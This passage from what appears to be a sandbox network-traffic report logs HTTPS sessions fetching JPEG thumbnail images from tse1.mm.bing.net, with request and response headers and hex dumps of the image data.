                                                                                                                                                                                                                                                                            Data Ascii: ^e43Me[i[_Gf0l6h!G?EyfvY&w^5Rz'z~uwVCu=zGCJOW,732r*<1Oq#XApE3{3ejdewm:-QZ\42APw
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: eb fc 88 e9 b9 9f 0c 5b 1b 7f cf 15 4f 50 f0 e5 e5 a6 95 77 a8 4d e2 18 25 ba 5f bf 63 b1 9b e6 66 1f 2a f3 f3 b6 78 e1 6b 4f 45 d3 ee 7c 39 a3 e9 fa 96 b5 ff 00 1f 52 bf 94 96 8f 1e ed 9f c6 df 32 9f be bf 27 18 e0 f7 ea 06 8e fa 19 27 1e 86 56 87 22 d9 f8 99 e1 d3 e7 93 fd 29 d9 a6 85 e0 f9 a1 c7 f0 f3 c8 c7 ad 6a c9 75 7d f6 4f 2e de 79 22 59 e2 68 a6 4f e1 75 db fc 43 f0 ef 59 da 2c 76 7f da af 75 67 26 d6 b8 79 25 9b ce 7d bb 3e 6f ba dd f7 77 3f 85 69 49 1c 49 3b ac 7f c5 33 37 ce ea ca 9f 7f e5 ff 00 be 7b 56 73 8e 86 b0 96 b6 2f 7c 29 d5 65 d1 3c 98 da de 76 b3 ba 78 7e d7 71 0e d5 95 15 15 db 72 6e 23 aa b3 7f 4a e9 fe 24 5c e9 9a cc 36 93 58 df c9 71 f6 8b 89 27 78 53 e5 fb 34 61 44 71 2e dd a3 90 ab f4 ae 73 4d 8e fa 58 d2 f3 ed 73 b4 2b 0a aa
                                                                                                                                                                                                                                                                            Data Ascii: [OPwM%_cf*xkOE|9R2''V")ju}O.y"YhOuCY,vug&y%}>ow?iII;37{Vs/|)e<vx~qrn#J$\6Xq'xS4aDq.sMXs+
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: ef fb 5d 2b 25 bc 35 73 06 a4 8b 25 a4 9f 32 2c 4e fb 37 74 5c f5 dd 86 ae 8b 4d d5 27 6d 49 23 8f 56 9f c9 b8 f9 7f 7c 9b b6 61 bf d9 c6 7e ee 07 15 e9 9a 2c 16 d7 11 a3 7e ed b6 fc bf 22 6d fd 36 ad 54 a6 e3 b8 46 9a 96 c7 88 d8 f8 3f 55 96 4f 2e de d2 4b c8 fe f4 3e 72 6d d9 f3 67 a5 76 da 5f 84 35 74 b1 78 74 5b 0b ab 0b 74 45 57 b4 9b 6e d7 5e eb 9e 0b 2f fb 19 fc eb d7 6c f4 f8 17 e6 f2 fe 6f f6 2a fd be 8f 03 fd ef 9a b9 de 2e c6 cb 06 9e e7 8f f8 27 c0 d3 d9 6a 56 97 d1 e9 b0 5b de 58 5f 47 2d a4 de 7b 34 b6 cb e6 1d c8 d9 27 7c 65 5f fd e5 af 78 b7 bd 9f cb fd e4 11 b7 fb 8f b6 a8 2f 87 ac 7c c4 93 c8 8f 72 d6 bc 28 be 62 2b 7d da ce 58 8e 67 7b 1a 47 0a a2 63 da eb fe 33 b5 8d da 1d 17 4a 69 a2 76 f2 7f d3 99 7c e5 3d f8 5f 97 1f 28 c7 f9 3e 7b
                                                                                                                                                                                                                                                                            Data Ascii: ]+%5s%2,N7t\M'mI#V|a~,~"m6TF?UO.K>rmgv_5txt[tEWn^/lo*.'jV[X_G-{4'|e_x/|r(b+}Xg{Gc3Jiv|=_(>{
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16069INData Raw: c5 6b 2f c1 3f 0d 3c e9 79 71 a9 78 82 59 22 4f 93 7e a3 f7 3f f1 da d2 f8 6f ac 6d d2 6d f6 d8 4f 71 33 3b 7d ad f4 b7 69 60 49 83 7c ed 93 b5 57 e6 eb 5d 65 d6 ab 12 cf f6 56 9e 38 9a 57 6d 88 ee bb 9f fb d8 aa bc ae 11 51 b1 e2 fe 36 f8 17 e1 79 67 87 50 b1 f1 45 f5 9d d5 d3 af fc 7f 3c 72 fd a7 1f 79 86 fd ad bb 6f d7 b5 66 dd 78 33 41 f0 53 f9 9e 24 93 52 d5 21 96 df ee 7d d5 76 0a 7e 67 f9 95 d7 01 73 91 ef 93 5e d5 a5 eb 36 37 b7 d6 f7 51 f9 97 11 c5 b9 52 68 93 cd 5f 2f e4 72 4f 7f cb db 35 6b c5 5a 67 87 b5 ed 35 f4 bd 4b c8 95 6f d1 55 12 6f e3 cf 4f 94 e3 91 f9 d4 f3 b5 a7 41 fb 34 dd cf 9e ec fc 67 e0 53 aa db ae 87 e1 7b 4b 7b 85 87 6d be a9 37 9d e5 7a f1 0b c9 ea bb 7e 66 e7 bf a5 4d aa 78 23 57 d6 7c 54 9a 97 85 e3 92 5d 1f 52 4f 3e 1b b9
                                                                                                                                                                                                                                                                            Data Ascii: k/?<yqxY"O~?ommOq3;}i`I|W]eV8WmQ6ygPE<ryofx3AS$R!}v~gs^67QRh_/rO5kZg5KoUoOA4gS{K{m7z~fMx#W|T]RO>
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: bf e3 f7 87 3c 41 e0 ad 1e 1d 0f 52 b0 fb 15 c2 df 34 a9 34 2f f2 cd 1e de a1 97 ef 73 f9 53 34 7d 1f 43 b7 f0 1c ba 82 f9 96 7a a5 94 d6 f2 4b 36 f6 6f ed 0c b6 f2 ed 0b e2 44 da 1f 6e f4 f9 4f 71 fc 45 4a 3c c5 27 ca cd 9f 84 f7 3a f5 e7 88 d3 5c b5 b4 d4 ad ed 56 c6 38 be dd 0c 0b b7 71 52 8d e6 71 87 dc dd f1 fe c9 ad 2f 8a 5a 24 fa 97 82 e6 f1 64 77 f6 b7 17 5a 4d f4 77 37 16 36 ef 0c 4c 8a 7e 57 65 85 71 ff 00 a0 ff 00 3a e7 3e 07 ea f0 69 1e 38 7b 1b 7d 5a 4b 58 6f 2d 2e 17 ce 4b a9 3c a9 a3 2d f7 5d 13 a8 f9 3a 62 bd 32 1d 73 48 bc d3 6e 2c 6f bc 2f a3 ad c5 e3 b5 b7 db b7 cc cb b8 7f 74 07 f9 38 6c ee 1f fd 8d 4c 63 75 62 a5 27 16 72 1e 0b bb bc b5 b1 d4 db 4f bf 92 c2 fa c1 16 58 6e ed 37 37 92 bb 51 da 07 e8 36 bf bf 7e 99 dc 6b b7 f0 0e ab 66
                                                                                                                                                                                                                                                                            Data Ascii: <AR44/sS4}CzK6oDnOqEJ<':\V8qRq/Z$dwZMw76L~Weq:>i8{}ZKXo-.K<-]:b2sHn,o/t8lLcub'rOXn77Q6~kf
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: 06 f7 d5 37 41 33 6d 3f bc dd b5 97 ee af 3b 1b 6f 4e 28 d4 a3 dd 1d c7 89 2c f5 2f 0f ff 00 a5 26 d9 a1 fb 0f 9e b7 b1 96 db 2c 37 0e 49 1c ee fb 9b 77 33 63 b0 c8 6f 85 fc 27 16 93 a9 5d c7 a8 41 6b 79 a7 cb 6e b1 5c 25 da 2a ef fd cf 1e 5a 3e 47 1f ba 50 dd 7f dd ae 7e eb 4f 68 b4 3b 7b cf 0e df c7 f6 5d 4b 74 b7 de 1d bb ba fe 20 d2 04 ff 00 68 ff 00 77 f5 0d d2 a6 d6 d9 1a 47 de 30 fc 7d a1 da b5 af d9 7c 2f e1 08 67 9b 52 87 fb 41 e6 96 79 19 93 63 10 e1 73 8c 7c cb 8f e3 dd b8 10 f5 c3 d9 e9 3a 9c 13 26 a8 d6 9e 54 91 6d 9d e1 77 fb ec 8d bb d7 fd ae 9f ed 77 af 6c 9b 5b b6 5d 2a d3 5a fe c9 92 e3 fb 35 e6 83 54 d2 61 48 e2 ba d3 f7 af cf 22 31 5f 9a 3d bb fe ee df b9 9c e3 35 e6 fe 2e f0 3e a0 b7 52 f8 b3 4d 9d e5 d3 f6 2c be 74 2f 1b 35 b7 f0 af
                                                                                                                                                                                                                                                                            Data Ascii: 7A3m?;oN(,/&,7Iw3co']Akyn\%*Z>GP~Oh;{]Kt hwG0}|/gRAycs|:&Tmwwl[]*Z5TaH"1_=5.>RM,t/5


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            6192.168.2.649733150.171.27.10443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:09:19 UTC375OUTGET /th?id=OADD2.10239402414229_1P4RDVHBQE93FAZFW&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                            Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                            Content-Length: 510198
                                                                                                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                            Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                            NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: A309CF8FB3ED493283538E0CF3106A0D Ref B: EWR30EDGE1016 Ref C: 2024-12-27T06:09:19Z
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:09:19 GMT
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC15530INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 f4 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 3a 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 ac 87 69 00 04 00 00 00 01 00 00 00 c0 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 36 2e 31 20 28 32 30 32 34 31 31 30 33 2e 6d 2e 32 38 33 34 20 31 34 64 33 65 37 34 29 20 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 34 3a 31 31 3a 31 32 20 31 33 3a 32 36 3a 31 33 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 07 80 00 00 a0 03 00 03 00 00 00
                                                                                                                                                                                                                                                                            Data Ascii: JFIFHHExifMM*bj(1:r2i``Adobe Photoshop 26.1 (20241103.m.2834 14d3e74) (Windows)2024:11:12 13:26:13
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: cc 71 37 d0 65 cf fe 83 5e 25 6a 0d c5 bc 90 23 7c ca b9 6d df e7 af 15 e9 60 a0 94 5c 8f 2b 1d 36 e6 a2 48 9a 94 f7 d6 b0 3f cb 14 92 61 19 95 76 f0 7a 83 ef 45 fc 56 71 7e fc 4e d9 5f f9 66 bf e3 55 34 d9 de e2 e2 54 91 56 3f 35 88 6d df c3 cf f4 a9 2f ed e4 8a f1 23 f2 16 55 6f bc db be 56 f7 ed 5d f1 5a 9e 6c 9f 52 95 e5 ec 30 43 1b cd f3 2c 8c 42 fc a3 6e 3a d6 46 9f 24 b0 eb 90 4b 1f cc 24 8c 95 dc bb 9b 24 e5 78 1d 6b a3 d4 2c ad f5 0d 2d a0 10 49 fb b8 98 fd dd db 4f 6c 1a 83 c1 76 11 ad d3 4b 71 12 b4 b1 2f ca bf 79 79 c0 5f c6 b6 56 b3 39 dd f9 d7 63 3a fe 0b 97 b8 52 db 9a 58 db e6 f9 7e ef d6 b2 fc 49 1d c3 5b c4 b2 6e 62 ad fd da ed b5 0b 29 16 e1 a5 12 6d dc df 32 ee dd d2 b2 3c 43 26 fd 1e 42 91 36 dd d8 8f 72 ed 6c 8e bc 54 4a 3a 1b a9 ab
                                                                                                                                                                                                                                                                            Data Ascii: q7e^%j#|m`\+6H?avzEVq~N_fU4TV?5m/#UoV]ZlR0C,Bn:F$K$$xk,-IOlvKq/yy_V9c:RX~I[nb)m2<C&B6rlTJ:
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: 26 da 31 ed 40 ac 47 b6 85 5a 93 1e d4 63 da 80 b1 1b 2d 26 da 97 1e d4 98 a0 2c 45 b6 91 96 a6 c6 29 31 ed 40 88 59 69 8c b5 3b 2d 46 c2 9a 02 26 5a 6b 2d 4a c2 9b 8f 6a 4c 08 99 6b c8 3f 6a bd 46 38 ad 74 8d 2c b7 dd 91 ae a5 55 6f 9b 00 6c 5f cf 2d 5e 9f e3 3d 72 d3 c3 9e 1f 9f 54 b9 5f 33 cb c0 8a 25 6d ad 34 87 a2 8f f3 c0 af 9d b5 e9 2e fc 4f e2 89 35 7d 56 7f 32 4d df 77 76 d5 53 d4 2a 83 fc 22 bd 0c 05 27 29 fb 47 b2 3c cc 7d 64 a0 e9 ad d9 e7 fe 34 16 d6 11 c6 77 34 72 5c 7d d8 9b ef 28 7e 73 9f a5 73 7a 80 9e d2 66 b4 76 db b7 e6 66 8a 4d df 5c e3 b5 3b e2 4d c3 c5 e2 a9 64 8e 4f 34 2b 91 fb c5 cb 73 c6 08 f6 ac 88 f5 30 fa 5c 76 ef f3 c9 13 1d bb 5b 69 c1 f5 c5 7d 24 1d 95 8f 96 a9 16 e5 74 4c d6 57 37 5f bb b5 55 65 56 25 59 be 56 6e 3d 2b 23
                                                                                                                                                                                                                                                                            Data Ascii: &1@GZc-&,E)1@Yi;-F&Zk-JjLk?jF8t,Uol_-^=rT_3%m4.O5}V2MwvS*"')G<}d4w4r\}(~sszfvfM\;MdO4+s0\v[i}$tLW7_UeV%YVn=+#
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: 3d fe d9 26 68 4e d8 d9 73 c6 79 3e 94 ac d6 e4 5d 33 99 f1 65 dc 77 7a 5b 25 d4 f2 44 19 24 31 2c 8b b5 2e bf ba c0 8e e3 ad 70 cc 6e 2c be d2 25 f9 a2 b9 8f 64 72 ab 7c 8c 33 82 47 e3 5e ab e2 0b 0d 2f 52 8e 39 6e 25 b1 8e 68 f0 16 49 24 f9 63 40 73 b5 47 03 24 7b 57 2d a9 78 56 3b fb 85 92 0b 9f dd f0 f2 44 cb f2 aa 2f 65 c7 4c 9a 77 4d 04 24 93 2a f8 3e ca ca df 68 9e 28 e4 ba 9d b2 be 64 db 16 38 c7 b5 6b 43 07 f6 84 97 51 6d 8d ad 55 4c 6a d1 2e df 24 b7 45 27 1f 33 77 f6 a9 af b4 e8 b4 ed b7 f2 45 24 9e 54 78 89 5b 1b 63 03 d3 8c f3 ef 59 9a 3e a4 2d bc 40 df 2c 8d f6 e8 97 ee c6 7e 67 c9 27 eb c1 eb 42 09 6a ca b7 3a e8 87 4b 9e 28 3c d8 ef 20 61 0c bf 31 db 21 ce dd d8 ed 9a b3 e3 8b 51 17 85 ed a7 8a 59 18 ac 90 ed fe 2e ae 3f c6 a4 d4 34 08 24
                                                                                                                                                                                                                                                                            Data Ascii: =&hNsy>]3ewz[%D$1,.pn,%dr|3G^/R9n%hI$c@sG${W-xV;D/eLwM$*>h(d8kCQmULj.$E'3wE$Tx[cY>-@,~g'Bj:K(< a1!QY.?4$
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: 24 3c 44 1e e7 45 75 77 a7 fd 86 28 93 50 8d 8c 7c 6d 5c f4 e0 1f ce a9 69 b0 95 f1 02 bf cd fb 86 8f 6a b3 6e dc 33 cf e9 58 d6 33 a3 db c6 e9 b5 4a b6 6b 47 49 96 43 a8 3c e2 2f 30 ac 7f 32 ed fc bf 3a e8 8c b4 67 15 4a 4a e9 9a 7e 32 31 4b 6b 1d b5 84 0c 92 49 39 76 fe f3 13 fa e2 96 e3 4a 78 64 80 48 ad 14 6b fe be 46 5d dc 91 d3 e8 3d 69 da 7d b8 95 9a e6 e1 59 84 18 db 1a ff 00 cb 47 ea 7e 8a 2a 7b 8f 10 9b bb 39 ec 42 b4 10 f4 dd e5 86 5c 77 3c fb 66 a7 50 6d 22 6f 87 ba 5c 0d 75 2c b1 45 e6 24 52 15 f3 24 6e e3 e6 cf 15 a9 7e f7 12 5c 47 6d 68 de 61 6c 1b 96 dc 36 46 99 ef 4c f0 78 16 1a 4b 24 1b 55 59 49 56 97 3f 30 3e a7 e9 cd 4c d1 ce f7 d1 0d 3f cb 92 49 14 c8 cb b4 28 67 c1 55 07 db 9a ce 49 f3 1a c6 49 41 23 3f 5e 57 fb 1d b0 b7 89 71 23 67
                                                                                                                                                                                                                                                                            Data Ascii: $<DEuw(P|m\ijn3X3JkGIC</02:gJJ~21KkI9vJxdHkF]=i}YG~*{9B\w<fPm"o\u,E$R$n~\Gmhal6FLxK$UYIV?0>L?I(gUIIA#?^Wq#g
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: a7 bb bc 90 09 19 7e e2 81 c7 27 ae d1 5d 6d e4 51 d8 de 5b 5c 36 ef 29 72 91 45 1a fc aa e7 1c 80 3f 13 4e 6e ec 8a 70 b2 ba 20 d3 fc 3d a6 69 97 92 1f bd e7 c7 86 dd f3 32 91 d9 7f d9 f6 ad 4d 36 d2 38 2e 25 b9 95 96 45 6c ee 8d 97 e6 c6 3b 7a 56 66 a9 26 75 a8 52 49 db ca b9 fd dc 5f 28 6e 9c fe bd 2b 52 d9 ec ac ed e5 89 d6 45 2d c7 fb 4d ed 50 e3 a1 a7 37 72 dd e5 a0 58 e3 92 e1 55 a3 dd 95 6d bb bb 74 03 fb b4 29 02 16 21 57 2d 17 ee d7 f8 b3 ef 54 bc 45 ac 5c 88 60 b0 b1 b6 56 f3 63 3b 5b 76 df 24 0c 7e 78 15 4b 56 d6 9a ca 35 31 aa cb 2a af f0 b7 dd cf 73 f8 53 84 65 62 2a 4d 5c b5 a9 44 97 1a 4f 9e bf bb 2d 1e c6 db f7 97 8c 10 7d eb 8e d6 16 4b 2b 7f 2e e5 96 4b 69 54 06 66 fb cb c5 74 76 af 79 7b a7 b5 ec 77 2d 15 b5 cc ac 60 8d a3 da 58 74 2c
                                                                                                                                                                                                                                                                            Data Ascii: ~']mQ[\6)rE?Nnp =i2M68.%El;zVf&uRI_(n+RE-MP7rXUmt)!W-TE\`Vc;[v$~xKV51*sSeb*M\DO-}K+.KiTftvy{w-`Xt,
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: ad 64 2e 6d 63 69 6d 9a 49 04 12 7f aa 93 ef 46 3b e3 da b5 e3 78 2f 6c 70 55 66 8a 75 f9 95 be 65 60 6a f9 12 31 f6 8d e8 c6 ea 46 08 ec 65 99 e2 69 0c 4a ce df 66 5f 9d 80 ed 8a cc d3 f5 1b 6b 8b 58 ee 6d ef 16 58 e4 5f 97 77 de fa 7e 1e 95 72 c2 c2 ca c6 cd ad ec e2 5b 68 d5 fc cd aa c5 b6 9e bb b9 a4 9a ce de 4b 89 64 68 20 69 3e ff 00 ee d4 6e 90 e3 a9 ff 00 6a 8b 02 9e a4 6b a8 41 1c 8b 1e e5 69 24 fb ab 1b 6e dd f9 73 8a d1 83 cc 95 78 5e 3f bd 54 2c 2d ac a3 93 ed 29 67 1c 72 37 de 6d a3 77 bf 35 b5 6e c0 56 53 b2 3a a9 cb 9b a8 eb 5b 60 bc 9e ad 56 b8 0b 8a af 34 e9 1c 6c ee ca aa bf 79 99 be 55 a7 f9 88 63 f3 47 cc 19 73 f2 fa 57 3b 4d 9d 2a 56 0b cb 88 2d ed 5a 5b 99 56 28 d5 49 66 6f e1 02 bc c7 50 d4 6d af b5 25 b6 8e 36 90 4f 21 3e 66 e0 8b
                                                                                                                                                                                                                                                                            Data Ascii: d.mcimIF;x/lpUfue`j1FeiJf_kXmX_w~r[hKdh i>njkAi$nsx^?T,-)gr7mw5nVS:[`V4lyUcGsW;M*V-Z[V(IfoPm%6O!>f
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16067INData Raw: a9 58 c4 37 41 9f 2c 19 23 db f3 29 3d 71 f8 d6 b2 91 84 29 a6 ee 73 ba df da 6c e4 6d 3e de 56 68 e3 da df 2b 7d d2 46 78 ae d7 e1 a6 ad ae 6a 7a 6c f0 6a 0c cb f6 6c 47 1d cb 7d ff 00 5c 60 f5 e3 bd 72 7e 27 36 63 50 8e 2d 3f 73 34 8b 89 19 9b ef 1c f7 fa 56 cf 85 75 2b cb 0b 59 ed 12 06 6b 98 f0 63 89 98 2b 73 f5 ea b9 15 cf 53 de 47 75 3d 15 ce b3 c4 36 31 df 68 f2 db ce cc de 7e 12 45 5f 97 77 3c 75 fc eb 9c 9b 49 8e eb c3 f3 bd bc f2 79 b6 d1 62 25 dd bb cc 78 f8 da 7e b8 fc eb 41 7c 41 67 23 47 a7 df 4f f6 6b c8 f1 e6 ee 5d cb f8 11 d7 e9 50 db 6a 5e 4e ad 2f db 65 8f ec 92 47 e6 47 2a ff 00 cb 32 4f 3d 70 47 dd 1f f7 d5 44 14 91 52 e5 93 29 db df 3d ef 87 6d ae ed 2e 7c b9 9a 31 1c f1 c9 d5 88 eb b8 63 39 15 cf f8 82 d4 c6 ca ee fe 6b 4a d8 da bf
                                                                                                                                                                                                                                                                            Data Ascii: X7A,#)=q)slm>Vh+}FxjzljlG}\`r~'6cP-?s4Vu+Ykc+sSGu=61h~E_w<uIyb%x~A|Ag#GOk]Pj^N/eGG*2O=pGDR)=m.|1c9kJ
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: 00 d5 de a0 bb 8e 57 9a 39 43 33 08 ff 00 e5 97 1b 5b eb 9a 46 92 0b 2b e8 e5 f2 a3 8c cf c6 ef ba cc 4f f3 35 56 d0 84 f5 26 3b 66 56 8d f7 36 df bd b7 8d b9 a5 91 7e ee 59 97 6e 36 ed 6f 4a 6c d7 76 90 dc 2d be e9 1a 4b 96 23 6e ef bb c6 7f a5 4d 21 43 d3 ad 25 70 d3 b8 fb 3b 93 32 ec 75 da df ef 7c b4 f5 ca ab 6f ac c9 12 76 93 64 0c d1 5c 32 92 8c df 32 71 eb 57 16 59 7e cb 18 7d be 6e d1 e6 7f 12 a9 c7 34 e5 15 7d 02 32 76 d4 97 cc da d8 3d 29 33 b7 8f bd ba ab 35 c4 66 45 8c ca bb 99 72 ab ed eb 4f de bd 0b d3 e5 12 95 cb 51 83 b7 27 fe f9 aa d2 4a 7e d9 e5 fc df 77 2d ba 8d f2 26 d2 9f 32 37 de a9 64 08 eb b4 d4 da c3 6e fb 0d dd 89 17 0d b8 d4 eb 26 17 96 ac c6 93 ca dd 1a af dd e3 fd ea 9e 17 df 6f c3 73 fe d5 54 a0 38 55 e8 3a 69 33 b8 d3 61 7c
                                                                                                                                                                                                                                                                            Data Ascii: W9C3[F+O5V&;fV6~Yn6oJlv-K#nM!C%p;2u|ovd\22qWY~}n4}2v=)35fErOQ'J~w-&27dn&osT8U:i3a|
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: b3 48 db be 71 c0 db c0 01 71 52 da 68 d1 49 dc d5 f0 8d 81 1a 1d b2 41 e5 c1 0c 6b 95 55 8f e6 6c 8e 7a f4 cd 49 a9 5a ce cd 1c 6e bb a4 93 85 6d bb 92 11 dc ff 00 f5 ab 52 dd 62 87 f7 68 db 63 db fe ad 57 f5 ac b8 e4 13 6b d2 79 52 ac 8b 1a e6 4f e2 55 39 c0 c7 e1 52 95 dd ca 93 b2 45 c7 d3 e2 95 58 dd b3 5c 8d a0 6d e7 0a 07 4e 3b d6 0e 97 6b 77 06 b5 7d 79 76 bb 4e d0 2d 95 5b e4 58 fe 9f de ae 9a d6 44 6d db 5b 76 ef f8 0d 53 6d 2e c9 ae 9a 73 b9 64 6c 7d e9 09 55 c7 a0 34 bd 47 7e c6 36 a6 c5 ed 56 31 2a b0 93 2e ae bf 75 48 f5 f6 ae 77 5b f1 95 a6 97 0d 8d bd bc bf 6a 93 94 bb 81 7e fa f5 c6 4f 4d de d5 a3 ae 48 f6 2b 25 b3 ac 7e 5a e4 6e fe ef 53 f3 7b 1e 2b 8f d5 2c 46 a5 a7 ae af e5 2c 7a a5 d4 fb fc ad bb 7f 76 38 24 0f e2 e7 bd 55 ac 82 32 52
                                                                                                                                                                                                                                                                            Data Ascii: HqqRhIAkUlzIZnmRbhcWkyROU9REX\mN;kw}yvN-[XDm[vSm.sdl}U4G~6V1*.uHw[j~OMH+%~ZnS{+,F,zv8$U2R


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            7192.168.2.649732150.171.27.10443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:09:19 UTC346OUTGET /th?id=OADD2.10239402414228_1EUMX2S6TUEXTBXLL&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                            Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC856INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                            Content-Length: 508979
                                                                                                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                            Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                            NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: 2F48E96EB48549D28E9DE46FE4DB1A83 Ref B: EWR311000107019 Ref C: 2024-12-27T06:09:19Z
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:09:19 GMT
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC15528INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 f4 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 3a 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 ac 87 69 00 04 00 00 00 01 00 00 00 c0 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 36 2e 31 20 28 32 30 32 34 31 31 30 33 2e 6d 2e 32 38 33 34 20 31 34 64 33 65 37 34 29 20 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 34 3a 31 31 3a 31 32 20 31 33 3a 32 36 3a 35 38 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 04 38 00 00 a0 03 00 03 00 00 00
                                                                                                                                                                                                                                                                            Data Ascii: JFIFHHExifMM*bj(1:r2i``Adobe Photoshop 26.1 (20241103.m.2834 14d3e74) (Windows)2024:11:12 13:26:588
